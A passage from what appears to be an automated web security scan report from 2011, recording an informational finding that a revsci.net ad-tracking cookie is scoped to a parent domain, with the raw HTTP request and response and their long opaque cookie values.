V1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_RLoX="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolrCp6V9WP6iKbjeS1EvCK92z+QAmHiwdDZ+f+w10PqgVO/YI7X9OTHEbPpAc8e2VDA3Fy31gPZUZAJpsTqWaE97/6FPY2NufszctJYIDjVFtpyQn8CIEl2pP5/WmiDRs5+5ldM/RqXaWGvpbKccLNNK+bHIeB/KB6emLyn3x9lyQcgxTwTw3WZiyKC/pixONM8XtR9CFfCcTaaA0iu7gFqbOmO1VGZpHd4EIfp/mfUu4V5s8UbmSUOk1eKfOF2wahK/g7NzowboXwG/s9yEYrm8miw6JjwmXnYqsdNKf/Yqgvb+GDmVq2+uwYMqC2uxW5Nt+m5HH3kYHoZyYJzP06syyIdA4gXdeVbIqRy5IJ9Z/kfcGdDqxtAF4SSN3ABrVIDUASwZwchkGh73UAGo0FLm+kBe7aIWTvaCLXxGgRyvEgkaAbAx4mjwLsnqZncXx5bxIGa0dW/+bDU5M/THVsio2zxi/ZUVsskwnWa8Rstgda3cvKrBf9n9YaQ84slrTPonu+6Jl447zRZxVAbRm2EjsmJTj499gi8PVuBhOLjjdXhLPn2/UhDINCl3s/D9zCSCNJP6tuy59gJSnQLjFafPpp3Bsyqo5gRgfFT+cgfR5FqRfnb1nAR1mtfkWKTerGd709uzGfCakBd3Ualj0M+NjWlueNxoamj2iA44DNbKLYjxxoGA8SSAJAMugy4sqbsZpKmSIS87O0tZpATYnWYFi9cLpfOLRE6NnfQ+YBozLhyHOsbn7PyVsOsrzjeFq5gVCa5ejJjg5lN5FJeq/OYeDZ6Gvm+/YxER2h4/9Xfi6mJ68blv+WLLwDUItkGCIIU5/srl61MfKNoLsLiBilvpeQ42IUZAJksxbL86av5hcjR2cf0vA960x4k+FQ+YOrbLaXvNJ+ELem/hpZQhYtrIVk+4Qu45yeAK+LAboAgr7mIU/nV1cnxzml0hpdot9dlxNym8EdGagMMXGMa5U14Hh5SuuHMkwkQrI3v+OABl48/rpJ9Ns9qh5t90q1dTSpo7+O9FQknBtJzWW8zAHP8wnsWlpM6KDB3Q09PYFJOZmCa8k+Vz3cgjSUrcWf9FMoRj2zfB38f4zxDvPX0z9iX/+JGoaEZrD6va5MMXvvAl8SB07dV2/7+l4cQu+9nCu3O+BYXQuGVtJs4vCTmNfXFLicApHLfFjj+6aj2oRawE6assAkYVvRQ8NOM/81me0kKWeo0PexiGkEwB+JG5rFDFo1ZC0pml3gB2+LyqOIIr1WHVLAk20A0tduxmxGxTVsM2csKMrCdelq7KNI4UNAldjrKAzaWwU5P/1uI="; rsi_us_1000000="pUM14ymnMBYY7dXKYa4+QBqlvdJdDfSHjrq8Yk+ulFzpImTPRZG965bS5IO512gB9+vbl6byANFyTJil563yJSnxDgB9BoshUkqN2MF/vfQ03ea69k3usr0THeqRusRn9KB39Zdv2hDh6RiPjHMpGxF7qzRB4eGo8GXOa1cwsHj5LNpFUOgdNaxE0qDMWcpRZkC09IWKwLqpNQkuxoXYih5PJZEgmuidZVc7xuuOinzqwcuujjrSFNDRG7FArDUD7s08ajLDzzCOJXGdTKDd1dhCadcK/Cm51mcetICb6V4flmrF9EyApdp6g8XCjp0QJeGwcbKc+a64i1joCiPXXBs348MtsiLMQji12itA07kMWpTbOxJHOuEnYRDjJrur+/NQX8ysf9K47P25gT9az0LudIyEA1Z+E9qFs0MDGOabh2y+z/qCq/tLESfAsPh1qm3t35+wa3LN1jWrJmQhPwUXcdq4d3o22XeQxkVHmdYIz3tH092QXroVISF6LzxpwGsmT/OvH/a3vASqFEOUT52i2tfn6fncA3Lnf3DDNMmYX+MeEf1Og5DTItZXD61CdeBCI2cjGBrJTBJyT3nreFca+VR5Z3HjjKhWFLqVYSbsn0ZYVB7LNEmgyiPfhzdRR6bWkjNJwozmOc3btrkNB9+NiVcGJUkIlGcFWvKXDXnha6xk+u0i4qctMzUn4T+rbQ83v/SYy/xbh8sP0ximSyS9fZWO5+Clu5kUk85bZMbCuB94k/KbB14aKZQ4ZvHoJq4zT9glm2ewijhKHhzErTPi0iMmBv4Ht8FJhCENtmChEiqxhdiDDP1SeW8h3eEPIBXDCs/wHf/xSMiEpwcP2Y98pdDjbRosuzCREAzM3TYioHSfNZFpQLwpvqLLAHKFDUakZ3P93Zp7WEmE9V6tD6Pup8UJryE1CORWQiB9Rst+H4Ve8ib/wiPGE7riSAwx/nmNBX+TympwelaDVPoCe5vP/0UpciqM2r2WdO0yZt9U7mCaVOj9vjofyg7KjB3KI3a7QQ2+I9W3XxevADytVwDRCaETLlfSXZRF8MTvb5toU0JrcfZK1avEeIy22iiKkgzYJ83IX1u99j0PmHe5IcWjX/WJm+tmxN/jF1vtCGUrz7Ai8vI+sbEVScmLZpP79tR6j7KRQ7HtBbmt3pD9pbI/NU9dc29rTUaDb6l1J5kXlaHa2xq2d4PnGmVI4Qe2yrbD5OngE4p1Nu1NGDYAjOJ0JkirWadPfDreVbEmmovfb8FDkX5cYklENMj8NXYgL+a8bECCQGSNFoL0HLx1/oNXmxH/argMgo0P3GQqyhoUVUKxLMvvz+UGwXPvbsXzh3Efd8De2wx5iSxGKgBsYDZQjYcEVhuEomghPRViHjn8139Y1o7bw2ha6HMGkyFn5ULshH6nv3jyFhUv1YC9zJergHj4zAuD4bMVpZAw4Jk59+NnglCaWSMZGdj1/aRIA9zUyanpoEMdrOWyQQ8SIteICD/wZCAUGu8d4AfyjYD5GjfMGe3gjHuJ7h9OUI9X0vUNz4TLytU8rjM0ytXk7IpmKvsMCT8RCD3GB9KxoUGivNo0cFS9d2PvfmTIyzAtRbcuyfnj+9S8K8uFth8CSHA6BQFTkBKNjyRiJc6JhrIwfrYJE327YpxjoPgjIZb4aEqwJk6MUMB85lZYIAiuRB1ZO38S/J9YW9NZUdl5fX5Lg9TrIXavEdS8GI8QUpY/bKW/v+ENJLHSbzMTS3dp44BxY7m/GIzGPDi2t1SXbwk5zt62ZcGpDQP4xNIB4caZAclA684="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzPsfMoDyEru/fEoGzjWn34t0qYyLT74yYxPJ+Rd63X2lVVT6vqpyfiQt1ZUaFhDJywmuN0xKn/PVO6q/9yxI5Dg3jlaU1c81sJz+2RW+lX8QueIgg4JxkVaxOtRmUFCPaUltH3yy2K+/mE8hwz7G6k3Go8eEvK1gYs0qSNpifAHNhpw5IAYPffBz0BwI0Shh0kOnWKsPZG2jksZoFQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54fwOVkMaFAobUG24cBItVdGihd0sK3hMs6HbnIYcP2I3tgk7tyNj/CzYfV5FqstcqOop1zqPFXKfIvvmEo0ON7M6w6+YxBJfrsIqbws/ZDBnp4g3ZVklyBZNtps8MXjN8V1WG8p/Ol7HkTm5q7eShAm36bmKM7dx1A/Vxwef83PAeTH8qIcBf02eAyO1/7xFtrS0DhXUOdRHhAzlA0KYq2ET5UVu59BjzK6KOWnK/nEb/SXdvcpSNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:15:44 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:15:44 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.139. http://pix04.revsci.net/I10985/b3/0/3/1008211/266715150.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/266715150.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfqkDDDA6eA08p566AWsC6dZEToDZUZ7/JkL2T9iF2WdR9KJhTybAZxS4F8a2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFWddAYMSGIntIJ56bP4P6/Yl+5XrH+SP65GfKkcTktT+ixZURa1DGnHu9JHEFB0mc0sF31AINfSJunXxe34XYbmFaIfjesfMWQXpheEvi041VI6cB5PWkN9EEOPhVD6kYISOzHi1mYdZ8NX5Voy+/nUm3e1K+DfKvY3L3ke5rRMvaZZt6BTdOxx6db2mp2hiLwrTkygILbiA5eUJuDXyNvAC52oOVf/ejg6t1LMkqPwWsWmnhyumL/+ztQ44CQzdB/PvH+Kf9vSQMvnX6CdIRf4eqLBaYL9wZ89pCHDj9TA7TN6znKPuazTN1uXnFQh7g+YauJCG0vRJlkLZ2JhTFXPyw3KOca5snkA/tFhkUHVRSZi3Bv+jFnqV1v1Hkj/kayttJKF31X7Ji6YV0ikrpLRZHqRm+rkvb/hVsZFF90TbcJj8HFd45r6m6g7g8ZNWHnfAa/gOp54xSyfsPeY6sWzt6IKQdWUHX7iMDMhesN4RKNyYcM3mb9hJMy/zos8eUq6DzvJAV5vLvpUTI6M7DV8YuWBRq4WHNNo=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:05:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/266715150.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_gmtv="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4llhxoQ3QVHjvCqNxuQAmHiwdDZ+f+xJ0E6qVO/YI8vCemT1DUjfH8oh8yRi/RAd80bpK/lFDTj9A5kkDRuEN30YAuOhJs2CmOnGedOFqVCI19QBNwzEp7AQzZDlSzvHNNnVJMLrLKccLNNG9bHIOP/JBKemryn3x9tyQMgxTwTwnSZiyIDfxixOOM8XtS9CFfCsDaaAkiu7gNqbOmO1VmZpHd4EIfp4lf0u4V5s8cYnykCk1SJvOF2+ahK/+7Nzowbq3QK/05z0YnkMdCateUuj/SPZEaNyD498Otuihiybj/wAsZeQ9X4PPJTsOIdpWG1WGRkZ5R+vr+XTXBP7IFyyJX9UGdjswX/3Qm2g1jNFthnIvsUN3l1/GpGCciZGrzZufdlLe90QWOIks27kL+s69DSPp3RtHcgNOVVYRejQpn+tz0+u4mJZPHuowW6DCuo1B8oszSI5fVSKsXNoqvI+ErnMEv1+U9VX8J65jAixpTa7gA9LQbl7krejCD8QHP7t1kFgGl4zgYDfhaxwE5KOnM438a3lS26i8esXynWIejLU1Q1hjjI019Sa1ZkpkC6QysRxAdZBUp8e4xKxugSNJAnpdBNGkLNYlLAej36iAzJkFLM+HByvsVhqXadpXUiYpXhm/x10WL/r9uhm7zzpYv8hdknAVy3VzJygvQvwJLoRtUiwEr/w5hl/QB5E4KMfuy8+QD9KAPfvnh1tgZCOBXwfWp2u7G60dy9Vs43RzwANhcg2J/6UQ0/56sW/Cteeykg3dhpJmJkuMdVFmNLkL/MvA7EilSTXkioqFYbi0XAvyTP7xQhU/9W/jAvJ5sjrRguvx0OICgoIuavwfKS+oDrw8FPgcgSq5ThjINeCskZg0w7RwdqVSOPX18N7IMu15fksBQHc7KczG3YGe8fSuCc1qonDAbThH8pdqQr2ZPBlffPe4iHLoLaITsWD0lSDmKmd2zGE//TpmNBWNnS7SbgiYqpXeT1x1s9DnlC0RFkAQsb4wr3Pekz6i0ZtPjrDUo+cJIBfL1BlSYKc19utLC/Dg4JIrZqTsoGpllz5LOixqOtCKtElY4kh2DEYWEUWzepHNrbkJmEP1ktDcuojdoRfUcr5GE+1F3Q1CBzoF9TdhIC4AsvXNmBBcl1JSbG0P0d6PjNEtyg8il6zrUrZWuCG7fvfb0P4lQLism3igStz5Uq7Fb7OhswCEMy/8TiVUK6lVg2jHywZWSAkHkGBXrJhFhjeO962G3BceTFinCxiM0isT7MnupjkrkyL1DW9WcUapBAz8S2/zRYAR6cwsrHfCQ=="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIduu0zKlUsklWARVd6+se6cClQA1kfsZF7mtNPw4ptcL5DdBkDKAojc77+KgeO/hZp9ehDhKYyNhnCZCDznJza1s1+3Feci/srO6SxznolswxPWHTz3wcdt94Y16K4URQL3/SaQ47qdzif0HCbjSqNdPz0i6dWRYx+sJ/vZdmv2U9UaUWmVOsa6nAiqu1RtX6tWS8RtN3S1JJKgcLbcfwVCJXvDT/ucrYqzkRsVCEcp3VCJy7MrJuCzgShhc8m3KBbg8qQ3AF3lCiMjM2k548QswmYutAebkL8RIEAXL6kMQguxVmt59rl8bUbMEHiltuhakDds27H2600AqNtHEy2USw5tMLWfLvgEu9DVOf5eUMeAt5PAiNjd5Uplt0qqSVnAaaOl2cXaI6QsAjrujJLgwJQXJvj7hyx+xLVSb0lSWpdEywJjaNUJlttpRPXn3mwwB7WUov7tBSZT5Yw49gtvbgeR6vS/pYWO3Y9XI1eHqlL3n1CDwg8xBRWak2/69bsCjbXTbMMSJtLN0v5gBVlBeR2DD9NWA2HbvPjsqQE0fB/otaogzQgzUuJT3yFecoAfGp55+Lz27OhYR8wcNR3ZBfruhhUyNJBCXvt70+WkSvjx8DPqFZ53R5JyA0JNpauWgOEmKjm++q8BXfAK7yRqNuQc9WJKdkL9Iv3EiV4hD0VpAW9b77VUQXHUdBQCPKorQuByi1kJICahjNh+sK7F9uFNParIk3qJosYR2M1h5gmiwt26uVxKxPCXzhSt8acviZE9e0CNbaWCwq9ajeNA/8EswRo0XRtcBY8juUWW6icPR3Taxs4hhNqKNuVaw2WfQc2FPpK6TTRYMbv/tjS2J9GxPBRtoBa2pmnjEg2cwE6Zih6GfB1WT2QdegbRFaICdC+l/vKzbHrKq0VGMBifZSmcJO4CPCjVY//F9DAa8+m3o+aWkBghphs/ED28I48cTB7FTcWJHXuvpbQs6qk0sGGCL2Qm2G7jocOOpBHUBUB2HhPc31J7OThksnfG6M3RiPtJLoOhujGBo6UPvjAr74jA4OKswU78Y6NYg7EcLi6OnwPK5vq16abTG9owpzKUW/j289fn6YrnC2vsPKnQAPD7xe5eP2s8DrgSglVqcCp3A5fzuvGlBpfGcdRpPWN/Gv12f7yeEbeEqLEuf0aEfDwvvv3YfI9jwzlZ62xFkzUQo4nv3UbQSNPkGxLhJRv1ODOO9zg0k2D2rMrE2MIJ3Hg2d6bLlTIPKSp0S4dDguJyhyDRVdHrRlb/M3tta/eeEvWkbBenr7VAjyZ17QIdpr1DI+o6qRbF+EUF1OURAWwYp05qvjx6mOpnPqvGiWnq8D6hhpRlltZc9F5xNMb/zScMVOE1X7t+OQyz04xvfmym8i4Xs/pSES40AdX6Cz8CIKqCNyk2Wd6aDEkSMysZlkDU6hYDTXEbzIDa3EAjt6KPb2zfB8RpwPFUyz8KzuXDHtcugSUzgpVUIfBmEsulXzpd3MXzN2B9GeEQfxaZwvg3Ny5iJT+tzBf6taQvSuL20MSLoOKwtq5w71FxjQ4PfS0acq6VNHDjuT1SJlaoX1obism73xVeD/zKt49OBtJAd/HzQ93O2ck4qrqD8IaBLh4rpnQOFzl53yQnK0ZjvRPLfkTqekmk0FO63N/958vGrs7cjCxS0xln3boMB2H7+OFOKJgheBCIQ4QyzN2mjB4Gni5rdsSitq7Hy4YRYQ=="; 